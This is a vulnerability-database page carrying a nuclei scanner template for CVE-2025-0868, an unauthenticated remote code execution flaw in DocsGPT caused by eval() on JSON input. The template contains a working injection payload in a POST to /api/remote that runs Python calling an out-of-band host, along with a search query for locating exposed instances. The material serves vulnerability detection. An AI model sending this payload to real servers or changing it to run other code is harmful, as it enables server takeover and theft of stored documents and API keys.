Lucene search
K

DocsGPT - Unauthenticated Remote Code Execution

đŸ—“ïžÂ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

Vulnerability in DocsGPT allows unauthorized Remote Code Execution via JSON data parsing flaws.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the eval() function on the DocsGPT software platform allows a perpetrator to execute any Python code.
24 Nov 202500:00
–bdu_fstec
Circl
CVE-2025-0868
20 Feb 202514:49
–circl
CNNVD
DocsGPT ćź‰ć…šæŒæŽž
20 Feb 202500:00
–cnnvd
CVE
CVE-2025-0868
20 Feb 202511:26
–cve
Cvelist
CVE-2025-0868 Remote Code Execution in DocsGPT
20 Feb 202511:26
–cvelist
Exploit DB
DocsGPT 0.12.0 - Remote Code Execution
9 Apr 202500:00
–exploitdb
GithubExploit
Exploit for CVE-2025-0868
25 May 202513:14
–githubexploit
Github Security Blog
DocsGPT Allows Remote Code Execution
20 Feb 202512:31
–github
NVD
CVE-2025-0868
20 Feb 202512:15
–nvd
OSV
CVE-2025-0868
20 Feb 202512:15
–osv
Rows per page
id: CVE-2025-0868

info:
  name: DocsGPT - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code remotely on DocsGPT servers through improper eval() usage, leading to complete system compromise and potential access to all indexed documents and API keys.
  remediation: |
    Upgrade to DocsGPT version 0.12.1 or later that addresses the eval() vulnerability.
  reference:
    - https://cert.pl/posts/2025/02/CVE-2025-0868/
    - https://cert.pl/en/posts/2025/02/CVE-2025-0868/
    - https://github.com/arc53/DocsGPT
  classification:
    epss-score: 0.15099
    epss-percentile: 0.96328
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Welcome to DocsGPT"
  tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln

http:
  - raw:
      - |
        POST /api/remote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#":11}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '"task_id":'
          - '"status":'
        condition: and
# digest: 4a0a00473045022034bbaccae4e5f7b36a6909c57cf7b6622d916ef3f99e57cc631b371b3c2cd78d02210091fc5a3244a05109b5d12c73055e147f831a513c6bdc99f4ca66575da5f8fa30:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 49.3
EPSS0.15099
SSVC
46